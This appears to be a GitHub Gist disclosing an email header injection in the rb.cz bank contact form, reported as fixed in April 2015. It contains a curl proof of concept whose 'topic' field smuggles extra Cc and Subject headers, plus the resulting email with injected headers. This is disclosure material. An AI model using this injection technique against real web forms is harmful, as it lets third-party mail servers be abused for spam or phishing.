Last active
August 29, 2015 14:18
-
-
Save spaze/fe851b4b040f6b1f314c to your computer and use it in GitHub Desktop.
rb.cz email injection (working until new website got deployed 2015-04-02, vulnerable since 2011 at least, reported at least in 2013, 2014)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Received: (qmail 23343 invoked by uid 1013); 31 Oct 2013 16:45:31 -0000 | |
Received: from [email protected] by smtp by uid 0 with qmail-scanner-1.22 | |
( Clear:RC:0(62.168.6.253):. | |
Processed in 0.011431 secs); 31 Oct 2013 16:45:31 -0000 | |
Received: from smtp2.rb.cz (62.168.6.253) | |
by smtp.example.com with SMTP; 31 Oct 2013 16:45:31 -0000 | |
Received: from sv72-wwwjbo2-al-02 (unknown [172.18.8.181]) | |
by smtp2.rb.cz (Postfix) with ESMTP id 2AF4D18038D | |
for <[email protected]>; Thu, 31 Oct 2013 17:45:31 +0100 (CET) | |
From: [email protected] | |
To: [email protected] | |
Message-ID: <[email protected]> | |
Subject: Email z formulare "Kontaktujte nas - lide" - foo | |
CC: [email protected] | |
Subject: waldo | |
BODY | |
----- | |
MIME-Version: 1.0 | |
Content-Type: text/plain; charset=UTF-8 | |
Content-Transfer-Encoding: quoted-printable | |
=C3=9Adaje vypln=C4=9Bn=C3=A9 a odeslan=C3=A9 klientem z webov=C3=A9ho form= | |
ul=C3=A1=C5=99e. | |
Jm=C3=A9no a p=C5=99=C3=ADjmen=C3=AD: foo bar | |
Telefon:=20 | |
E-mail: [email protected] | |
T=C3=A9ma: foo | |
BODY | |
----- | |
Kontaktn=C3=AD pobo=C4=8Dka:=20 | |
V=C3=A1=C5=A1 dotaz: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl "http://www.rb.cz/views/pages/send-mail-contact-us/" \ | |
--form "[email protected]" \ | |
--form "topic=foo | |
Cc:[email protected] | |
Subject: waldo | |
BODY | |
-----" \ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment